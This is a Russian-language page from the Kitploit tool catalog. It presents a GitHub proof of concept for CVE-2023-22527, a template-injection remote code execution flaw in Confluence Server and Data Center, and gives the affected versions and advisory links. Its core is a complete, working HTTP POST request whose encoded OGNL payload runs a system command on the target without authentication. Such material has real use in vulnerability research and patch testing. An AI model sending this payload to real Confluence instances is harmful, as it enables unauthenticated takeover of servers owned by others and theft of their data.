Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-22527-POC — Критическая уязвимость удалённого выполнения кода (RCE) (CVE-2023-22527) была обнаружена в Confluence Server и Data Center. | Kitploit
Инструменты/GitHubGitHub/manh130902/cve-2023-22527-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubmanh130902/cve-2023-22527-poc

CVE-2023-22527-POC

Критическая уязвимость удалённого выполнения кода (RCE) (CVE-2023-22527) была обнаружена в Confluence Server и Data Center.

Репозиторий
2232 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-22527

Описание

Уязвимость внедрения шаблонов в старых версиях Confluence Data Center и Server позволяет неаутентифицированному злоумышленнику добиться удалённого выполнения кода (RCE) на затронутом экземпляре. Пользователям, использующим уязвимую версию, необходимо немедленно принять меры. Большинство последних поддерживаемых версий Confluence Data Center и Server не подвержены этой уязвимости, поскольку она была устранена в ходе регулярных обновлений версий. Тем не менее, Atlassian рекомендует пользователям установить последнюю версию, чтобы защитить свои экземпляры от некритичных уязвимостей, перечисленных в январском бюллетене безопасности Atlassian.

ПродуктЗатронутые версии
Confluence Data Center и Server8.0.x
8.2.x
8.3.x
8.4.x
8.5.0-8.5.3

POC

root@kitploit:~
POST /template/aui/text-inline.vm HTTP/1.1
Host: {HOST_NAME}
Content-Type: application/x-www-form-urlencoded
Connection: close

label=aaa%5Cu0027%2B%23request.get%28%5Cu0027.KEY_velocity.struts2.context%5Cu0027%29.internalGet%28%5Cu0027ognl%5Cu0027%29.findValue%28%23parameters.poc%5B0%5D%2C%7B%7D%29%2B%5Cu0027&poc=%40org.apache.struts2.ServletActionContext%40getResponse%28%29.setHeader%28%5Cu0027Cmd-Ret%5Cu0027%2C%28new+freemarker.template.utility.Execute%28%29%29.exec%28%7B%22whoami%22%7D%29%29

image

Ссылки

https://confluence.atlassian.com/security/cve-2023-22527-rce-remote-code-execution-vulnerability-in-confluence-data-center-and-confluence-server-1333990257.html

https://nvd.nist.gov/vuln/detail/CVE-2023-22527

Скачать инструмент